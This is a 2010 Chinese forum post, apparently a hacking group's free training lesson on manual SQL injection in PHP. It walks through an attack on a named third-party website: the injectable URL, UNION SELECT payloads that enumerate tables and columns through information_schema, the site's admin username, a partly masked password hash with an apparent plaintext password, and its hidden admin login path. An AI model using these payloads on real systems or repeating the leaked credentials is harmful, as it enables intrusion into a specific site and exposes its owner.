|
|
饭客网络一周年免费培训之脚本渗透第八课:手工注入php
www.hackfans.com.cn
饭客网络安全培训基地
中国最大的网络安全培训
只做网络安全 信息安全方面的培训
宗旨:坚持 宣传 信誉 实力 回报
专业培训网络信息安全人才 成就中国网络安全边防军团
-------------------------------------------------------------------------------------------
教程名称:手工注入php
讲师:I.n.c゛啵、 QQ:380****7774
目标站:http://www.xabc.net/
我已经找到注入点http://www.xabc.net/xuexi.php?typeid=18
猜表名我们要用到table_name 和 information_schema.tables 了
我已经构造好了
http://www.xabc.net/xuexi.php?typeid=18 and 1=2 union select 1,2,table_name,4,5,6,7 from information_schema.tables
猜列名和表名差不多 用到column_name 和 information_schema.columns
http://www.xabc.net/xuexi.php?typeid=18 and 1=2 union select 1,2,column_name,4,5,6,7 from information_schema.columns
列名太多 我就不查了 先前已经查出来了 yjc_admin
y_admin y_pass
abc_net a191e01***43ce9c58f4ac3ebe86***05d xabc123
后台比较隐蔽 我已经找到了
http://www.xabc.net/lvinghack/login.html
http://www.hackfans.com.cn/mianfei/jiaoben/jb8.rar |
|
发表于 2010-12-16 19:30:40
